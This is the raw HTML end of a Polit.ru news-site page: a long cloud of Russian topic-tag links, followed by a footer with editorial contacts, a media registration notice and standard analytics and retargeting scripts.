  <a href="/tag/iran/" class="weight9">Иран</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/irkutskaya-oblast/" class="weight7">Иркутская область</a>
  

  

  

  
  <a href="/tag/iskusstvo/" class="weight4">искусство</a>
  

  
  <a href="/tag/islam/" class="weight8">ислам</a>
  

  

  
  <a href="/tag/islamskoe-gosudarstvo-iraka-i-levanta/" class="weight10 force-hi">«Исламское государство»</a>
  

  

  
  <a href="/tag/spain/" class="weight8">Испания</a>
  

  

  

  

  
  <a href="/tag/history/" class="weight9">история</a>
  

  

  

  

  

  
  <a href="/tag/istoria/" class="weight6">История человечества</a>
  

  
  <a href="/tag/italy/" class="weight9">Италия</a>
  

  

  

  

  
  <a href="/tag/jemen/" class="weight7">Йемен</a>
  

  

  

  

  

  

  
  <a href="/tag/kazan/" class="weight7">Казань</a>
  

  
  <a href="/tag/kazahstan/" class="weight8">Казахстан</a>
  

  

  

  

  
  <a href="/tag/kazn/" class="weight5">казнь</a>
  

  

  

  

  
  <a href="/tag/kaliningrad/" class="weight5">Калининград</a>
  

  

  

  

  

  

  
  <a href="/tag/kamchatka/" class="weight5">Камчатка</a>
  

  
  <a href="/tag/canada/" class="weight8">Канада</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kiev/" class="weight9">Киев</a>
  

  

  

  

  
  <a href="/tag/kino/" class="weight10 force-hi">кино</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/kirgiziya/" class="weight4">Киргизия</a>
  

  

  

  

  

  

  
  <a href="/tag/china/" class="weight10">Китай</a>
  

  

  

  

  
  <a href="/tag/climate/" class="weight6">Климат Земли, атмосферные явления</a>
  

  

  

  

  
  <a href="/tag/kndr/" class="weight9">КНДР</a>
  

  

  
  <a href="/tag/books/" class="weight5">Книга. Знание</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/comp/" class="weight5">Компьютеры, программное обеспечение</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/korablekrushenie/" class="weight7">кораблекрушение</a>
  

  

  

  

  

  
  <a href="/tag/corruption/" class="weight10 force-hi">коррупция</a>
  

  

  

  

  
  <a href="/tag/vosto/" class="weight6">космодром Восточный</a>
  

  

  

  

  

  
  <a href="/tag/space/" class="weight10 force-hi">космос</a>
  

  

  

  

  
  <a href="/tag/kprf/" class="weight7">КПРФ</a>
  

  
  <a href="/tag/theft/" class="weight7">кража</a>
  

  

  

  

  

  
  <a href="/tag/krasnodarskij-kraj/" class="weight7">Краснодарский край</a>
  

  

  
  <a href="/tag/krasnoyarskij-kraj/" class="weight6">Красноярский край</a>
  

  

  

  
  <a href="/tag/debts/" class="weight9">кредиты</a>
  

  
  <a href="/tag/kreml/" class="weight8">Кремль</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/helicopter_crush/" class="weight7">крушение вертолета</a>
  

  

  

  

  
  <a href="/tag/krym/" class="weight11 force-hi">Крым</a>
  

  

  
  <a href="/tag/krymskij-krizis/" class="weight9">крымский кризис</a>
  

  

  
  <a href="/tag/kuba/" class="weight6">Куба</a>
  

  

  

  
  <a href="/tag/kultura/" class="weight7 force-hi">культура</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/latviya/" class="weight7">Латвия</a>
  

  

  

  

  
  <a href="/tag/lgbt/" class="weight7">ЛГБТ</a>
  

  
  <a href="/tag/ldpr/" class="weight7">ЛДПР</a>
  

  
  <a href="/tag/levada-centr/" class="weight5">Левада-Центр</a>
  

  

  

  

  

  

  
  <a href="/tag/legkaya-atletika/" class="weight6">легкая атлетика</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/lesnye-pozhary/" class="weight6">лесные пожары</a>
  

  

  

  

  

  

  

  
  <a href="/tag/liviya/" class="weight6">Ливия</a>
  

  

  

  

  
  <a href="/tag/linguistics/" class="weight4">лингвистика</a>
  

  

  

  
  <a href="/tag/lithuania/" class="weight7">Литва</a>
  

  
  <a href="/tag/literatura/" class="weight8">литература</a>
  

  

  

  

  

  

  
  <a href="/tag/london/" class="weight6">Лондон</a>
  

  

  

  
  <a href="/tag/lugansk/" class="weight10">Луганск</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/malajziya/" class="weight7">Малайзия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mvd/" class="weight10">МВД</a>
  

  
  <a href="/tag/imf/" class="weight6">МВФ</a>
  

  

  

  

  

  

  
  <a href="/tag/media/" class="weight10">медиа</a>
  

  
  <a href="/tag/medicine/" class="weight10 force-hi">медицина</a>
  

  

  
  <a href="/tag/interdisciplinary_research/" class="weight0 force-hi macrotag">междисциплинарные исследования</a>
  

  

  

  

  

  
  <a href="/tag/meksika/" class="weight7">Мексика</a>
  

  

  

  
  <a href="/tag/memoriya/" class="weight9">Мемория</a>
  

  

  

  

  
  <a href="/tag/metro/" class="weight9">метро</a>
  

  

  

  

  

  
  <a href="/tag/gastarbeiter/" class="weight9">мигранты</a>
  

  
  <a href="/tag/mid-rossii/" class="weight10">МИД России</a>
  

  

  

  

  
  <a href="/tag/minzdrav/" class="weight7">Минздрав</a>
  

  

  

  
  <a href="/tag/minkomsvyazi/" class="weight6">Минкомсвязи</a>
  

  
  <a href="/tag/minkult/" class="weight7">Минкульт</a>
  

  
  <a href="/tag/minoborony/" class="weight10 force-hi">Минобороны</a>
  

  
  <a href="/tag/minobrnauki/" class="weight8">Минобрнауки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/mintransporta/" class="weight5">Минтранспорта</a>
  

  
  <a href="/tag/mintrud/" class="weight6">Минтруд</a>
  

  
  <a href="/tag/minfin/" class="weight9">Минфин</a>
  

  
  <a href="/tag/minekonomrazvitiya/" class="weight9">Минэкономразвития</a>
  

  

  
  <a href="/tag/minjust/" class="weight7">Минюст</a>
  

  
  <a href="/tag/crisis/" class="weight10">мировой экономический кризис</a>
  

  

  
  <a href="/tag/mistral/" class="weight5">«Мистраль»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mihail-saakashvili/" class="weight7">Михаил Саакашвили</a>
  

  

  

  

  

  
  <a href="/tag/mihail-hodorkovskij/" class="weight7">Михаил Ходорковский</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/iss/" class="weight9">МКС</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/moldaviya/" class="weight7">Молдавия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mosgorsud/" class="weight7">Мосгорсуд</a>
  

  

  
  <a href="/tag/moskva/" class="weight12 force-hi">Москва</a>
  

  

  

  
  <a href="/tag/moskovskaya-oblast/" class="weight10">Московская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/moshennichestvo/" class="weight9">мошенничество</a>
  

  

  

  

  

  

  

  
  <a href="/tag/music/" class="weight9">музыка</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mchs/" class="weight9">МЧС</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/navodnenie/" class="weight7">наводнение</a>
  

  

  

  
  <a href="/tag/nadezhda-savchenko/" class="weight8">Надежда Савченко</a>
  

  

  

  
  <a href="/tag/nalogi/" class="weight9">налоги</a>
  

  

  

  

  
  <a href="/tag/nanotechnology_topic/" class="weight7">нанотехнологии</a>
  

  
  <a href="/tag/drugs/" class="weight9">наркотики</a>
  

  

  

  

  
  <a href="/tag/nasa/" class="weight6 force-hi">НАСА</a>
  

  

  

  

  

  
  <a href="/tag/nauka/" class="weight7">наука</a>
  

  

  
  <a href="/tag/science_ru/" class="weight10">Наука в современной России</a>
  

  

  

  
  <a href="/tag/naftogaz-ukrainy/" class="weight8">«Нафтогаз Украины»</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/real_estate/" class="weight1">недвижимость</a>
  

  

  

  
  <a href="/tag/nko/" class="weight5">некоммерческие организации</a>
  

  
  <a href="/tag/nekrolog/" class="weight8">некролог</a>
  

  

  

  

  

  
  <a href="/tag/bunt/" class="weight3">Нерусский бунт</a>
  

  
  <a href="/tag/oil/" class="weight10">нефть</a>
  

  

  
  <a href="/tag/nigeria/" class="weight6">Нигерия</a>
  

  
  <a href="/tag/netherlands/" class="weight8">Нидерланды</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/Nobel_prize/" class="weight7 force-hi">Нобелевская премия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/novosibirsk/" class="weight7">Новосибирск</a>
  

  

  

  
  <a href="/tag/newtech/" class="weight8">Новые технологии, инновации</a>
  

  

  
  <a href="/tag/new_year/" class="weight6">Новый год</a>
  

  

  
  <a href="/tag/Norway/" class="weight5">Норвегия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/new-york/" class="weight6">Нью-Йорк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/oboronservis/" class="weight8">«Оборонсервис»</a>
  

  

  
  <a href="/tag/niu/" class="weight9">образование</a>
  

  

  
  <a href="/tag/obrushenie/" class="weight4">обрушение</a>
  

  
  <a href="/tag/obse/" class="weight8">ОБСЕ</a>
  

  

  

  

  

  

  
  <a href="/tag/obshestvennyj-transport/" class="weight6">общественный транспорт</a>
  

  
  <a href="/tag/society/" class="weight0 force-hi macrotag">общество</a>
  

  

  

  

  
  <a href="/tag/robbery/" class="weight8">ограбление</a>
  

  

  

  
  <a href="/tag/odessa/" class="weight7">Одесса</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/olympics/" class="weight9">Олимпийские игры</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/UN/" class="weight9">ООН</a>
  

  

  

  

  

  
  <a href="/tag/oppoziciya/" class="weight9">оппозиция</a>
  

  
  <a href="/tag/oprosy/" class="weight10">опросы</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/arms/" class="weight9">оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/otstavki-naznacheniya/" class="weight10">отставки-назначения</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pakistan/" class="weight7">Пакистан</a>
  

  
  <a href="/tag/paleontology/" class="weight5">палеонтология</a>
  

  
  <a href="/tag/palestinskaya-avtonomiya/" class="weight7">Палестинская автономия</a>
  

  

  

  

  

  

  
  <a href="/tag/pope/" class="weight4">Папа Римский</a>
  

  

  

  

  
  <a href="/tag/paris/" class="weight8">Париж</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pdd/" class="weight6">ПДД</a>
  

  

  

  
  <a href="/tag/pedophylia/" class="weight4">педофилия</a>
  

  

  

  

  
  <a href="/tag/pensionnaya-reforma/" class="weight8">пенсионная реформа</a>
  

  
  <a href="/tag/pentagon/" class="weight7">Пентагон</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/petr-poroshenko/" class="weight10">Петр Порошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pishevaya-promyshlennost/" class="weight3">пищевая промышленность</a>
  

  

  

  

  

  

  

  
  <a href="/tag/pogranvojska/" class="weight7">погранвойска</a>
  

  

  

  

  

  
  <a href="/tag/pozhar/" class="weight10">пожар</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/police/" class="weight10 force-hi">полиция</a>
  

  

  

  

  
  <a href="/tag/polsha/" class="weight9">Польша</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kidnapping/" class="weight4">похищение</a>
  

  

  

  

  

  
  <a href="/tag/human_rights/" class="weight6">права человека</a>
  

  
  <a href="/tag/pravitelstvo/" class="weight10 force-hi">правительство</a>
  

  

  
  <a href="/tag/pravo/" class="weight8">Право</a>
  

  

  
  <a href="/tag/human_rights_movement/" class="weight6">правозащитное движение</a>
  

  

  
  <a href="/tag/pravyj-sektor/" class="weight6">«Правый сектор»</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/acab/" class="weight7">преступления полицейских</a>
  

  
  <a href="/tag/prestupnost/" class="weight9">преступность</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/primorskij-kraj/" class="weight6">Приморский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/incidents/" class="weight11 force-hi">происшествия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/publ_lect/" class="weight8">публичные лекции</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/ramzan-kadyrov/" class="weight9">Рамзан Кадыров</a>
  

  

  
  <a href="/tag/AOS/" class="weight7">РАН</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kyrgyzstan/" class="weight7">Революция в Киргизии</a>
  

  
  <a href="/tag/redzhep-erdogan/" class="weight7">Реджеп Эрдоган</a>
  

  

  

  

  
  <a href="/tag/rejtingi/" class="weight8">рейтинги</a>
  

  

  

  

  
  <a href="/tag/religiya/" class="weight8">религия</a>
  

  

  

  

  

  
  <a href="/tag/army_topic/" class="weight4">Реформа армии</a>
  

  

  

  
  <a href="/tag/rzhd/" class="weight8">РЖД</a>
  

  

  

  

  

  

  

  
  <a href="/tag/ritejl/" class="weight6">ритейл</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/roskomnadzor/" class="weight8">Роскомнадзор</a>
  

  
  <a href="/tag/roskosmos/" class="weight8">Роскосмос</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rospotrebnadzor/" class="weight8">Роспотребнадзор</a>
  

  

  

  

  
  <a href="/tag/rosselhoznadzor/" class="weight7">Россельхознадзор</a>
  

  
  <a href="/tag/rossijskaya-akademiya-nauk/" class="weight8">Российская академия наук</a>
  

  

  

  

  

  

  

  
  <a href="/tag/Russia/" class="weight12 force-hi">Россия</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rostov-na-donu/" class="weight6">Ростов-на-Дону</a>
  

  
  <a href="/tag/rostovskaya-oblast/" class="weight7">Ростовская область</a>
  

  

  

  

  

  
  <a href="/tag/rpc/" class="weight8">РПЦ</a>
  

  

  

  
  <a href="/tag/rubl/" class="weight9">рубль</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/russian_nationalists/" class="weight6">русские националисты</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/rfs/" class="weight6">РФС</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/st_petersburgh/" class="weight10 force-hi">Санкт-Петербург</a>
  

  
  <a href="/tag/sankcii/" class="weight11 force-hi">санкции</a>
  

  

  

  

  

  
  <a href="/tag/saudi_arabia/" class="weight7">Саудовская Аравия</a>
  

  
  <a href="/tag/sahalin/" class="weight4">Сахалин</a>
  

  

  
  <a href="/tag/sberbank/" class="weight8">Сбербанк</a>
  

  

  
  <a href="/tag/sverdlovskaya-oblast/" class="weight6">Свердловская область</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/communications/" class="weight7">связь</a>
  

  
  <a href="/tag/telecom/" class="weight9">связь и телекоммуникации</a>
  

  
  <a href="/tag/sevastopol/" class="weight7">Севастополь</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/selskoe-hozyajstvo/" class="weight7">сельское хозяйство</a>
  

  

  

  
  <a href="/tag/separatizm/" class="weight10">сепаратизм</a>
  

  
  <a href="/tag/serbiya/" class="weight5">Сербия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-lavrov/" class="weight9">Сергей Лавров</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-sobyanin/" class="weight7">Сергей Собянин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sergey-shoigu/" class="weight8">Сергей Шойгу</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/siriya/" class="weight11 force-hi">Сирия</a>
  

  

  

  

  

  
  <a href="/tag/skolkovo/" class="weight8">Сколково</a>
  

  

  

  
  <a href="/tag/slavyansk/" class="weight7">Славянск</a>
  

  

  
  <a href="/tag/committee_of_inquiry/" class="weight11 force-hi">Следственный комитет</a>
  

  
  <a href="/tag/sledstvie/" class="weight9">следствие</a>
  

  

  

  
  <a href="/tag/smartphones/" class="weight4">смартфоны</a>
  

  

  
  <a href="/tag/mass_media/" class="weight7">СМИ</a>
  

  

  

  

  

  
  <a href="/tag/sovbez-oon/" class="weight7">Совбез ООН</a>
  

  

  

  
  <a href="/tag/sovet-po-pravam-cheloveka/" class="weight4">Совет по правам человека</a>
  

  
  <a href="/tag/sovet-federacii/" class="weight9">Совет Федерации</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sotovaya-svyaz/" class="weight6">сотовая связь</a>
  

  

  

  
  <a href="/tag/social_network/" class="weight8">социальные сети</a>
  

  

  
  <a href="/tag/sociology/" class="weight5">социология</a>
  

  
  <a href="/tag/sociology_russia/" class="weight7">Социология в России</a>
  

  

  
  <a href="/tag/sochi/" class="weight8">Сочи</a>
  

  
  <a href="/tag/sochi_olympics/" class="weight9">Сочи 2014</a>
  

  

  

  

  

  
  <a href="/tag/spartak/" class="weight6">«Спартак»</a>
  

  

  

  
  <a href="/tag/specsluzhby/" class="weight5">спецслужбы</a>
  

  

  

  

  

  
  <a href="/tag/spravedlivaya-rossiya/" class="weight7">«Справедливая Россия»</a>
  

  
  <a href="/tag/sputnik/" class="weight8 force-hi">спутники</a>
  

  

  

  

  
  <a href="/tag/ussr_topic/" class="weight8">СССР</a>
  

  
  <a href="/tag/stavropolskij-kraj/" class="weight6">Ставропольский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/stihijnye-bedstviya/" class="weight8">стихийные бедствия</a>
  

  
  <a href="/tag/stix/" class="weight7">Стихотворения на случай</a>
  

  

  

  
  <a href="/tag/strahovanie/" class="weight5">страхование</a>
  

  
  <a href="/tag/strelba/" class="weight9">стрельба</a>
  

  

  

  

  
  <a href="/tag/building/" class="weight7">строительство</a>
  

  

  

  

  

  

  
  <a href="/tag/courts/" class="weight11 force-hi">суды</a>
  

  
  <a href="/tag/suicid/" class="weight7">суицид</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/usa/" class="weight12 force-hi">США</a>
  

  

  

  

  

  
  <a href="/tag/tadzhikistan/" class="weight5">Таджикистан</a>
  

  
  <a href="/tag/tailand/" class="weight8">Таиланд</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/tatarstan/" class="weight7">Татарстан</a>
  

  

  

  

  

  
  <a href="/tag/theatre/" class="weight7">театр</a>
  

  

  

  
  <a href="/tag/TV/" class="weight9">телевидение</a>
  

  
  <a href="/tag/telefonnyj-terrorizm/" class="weight4">телефонный терроризм</a>
  

  

  

  

  

  

  
  <a href="/tag/terakt/" class="weight10">теракт</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/terrorizm/" class="weight11 force-hi">терроризм</a>
  

  

  
  <a href="/tag/technology/" class="weight0 macrotag">технологии</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/transportation/" class="weight9">транспорт</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/turizm/" class="weight9">туризм</a>
  

  

  

  
  <a href="/tag/turciya/" class="weight10 force-hi">Турция</a>
  

  

  
  <a href="/tag/dungeons_and_dragons/" class="weight9">тюрьмы и колонии</a>
  

  
  <a href="/tag/murder/" class="weight11 force-hi">убийство</a>
  

  

  

  

  

  

  
  <a href="/tag/uefa/" class="weight6">УЕФА</a>
  

  

  

  

  

  
  <a href="/tag/ukraine/" class="weight13 force-hi">Украина</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/trud/" class="weight6">Условия труда</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/fas/" class="weight7">ФАС</a>
  

  

  

  

  

  
  <a href="/tag/federalnaya-migracionnaya-sluzhba/" class="weight7">Федеральная миграционная служба</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/physics/" class="weight7">физика</a>
  

  

  

  

  
  <a href="/tag/philipines/" class="weight4">Филиппины</a>
  

  

  

  

  
  <a href="/tag/finland/" class="weight6">Финляндия</a>
  

  
  <a href="/tag/fifa/" class="weight8">ФИФА</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fondovaya-birzha/" class="weight9">фондовая биржа</a>
  

  

  

  

  

  

  
  <a href="/tag/photorep/" class="weight7">фоторепортаж</a>
  

  
  <a href="/tag/francois_hollande/" class="weight7">Франсуа Олланд</a>
  

  

  
  <a href="/tag/france/" class="weight10 force-hi">Франция</a>
  

  

  
  <a href="/tag/fsb/" class="weight9">ФСБ</a>
  

  
  <a href="/tag/fsin/" class="weight7">ФСИН</a>
  

  
  <a href="/tag/fskn/" class="weight6">ФСКН</a>
  

  

  

  

  

  

  
  <a href="/tag/soccer/" class="weight11 force-hi">футбол</a>
  

  

  

  
  <a href="/tag/habarovskij-kraj/" class="weight7">Хабаровский край</a>
  

  

  

  

  
  <a href="/tag/hakery/" class="weight9">хакеры</a>
  

  

  

  

  
  <a href="/tag/harkov/" class="weight6">Харьков</a>
  

  

  

  

  

  

  
  <a href="/tag/hillari-klinton/" class="weight8">Хиллари Клинтон</a>
  

  
  <a href="/tag/chemical_weapon/" class="weight7">химическое оружие</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/huliganstvo/" class="weight5">хулиганство</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight10">Центробанк</a>
  

  

  

  

  
  <a href="/tag/cik/" class="weight7">ЦИК</a>
  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/cska/" class="weight6">ЦСКА</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight7">Челябинская область</a>
  

  

  

  

  

  

  
  <a href="/tag/chekh_republic/" class="weight3">Чехия</a>
  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  
  <a href="/tag/world_cup_2018/" class="weight6">ЧМ-2018</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight6">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight7">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight6">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  
  <a href="/tag/showbiz/" class="weight4">шоу-бизнес</a>
  

  
  <a href="/tag/shpionazh/" class="weight8">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight7">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight9">экология</a>
  

  
  <a href="/tag/economy/" class="weight10">экономика</a>
  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight9">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight8">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/estoniya/" class="weight6">Эстония</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight6">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight8">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="//counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефон: +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/article/2017/06/19/csr/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

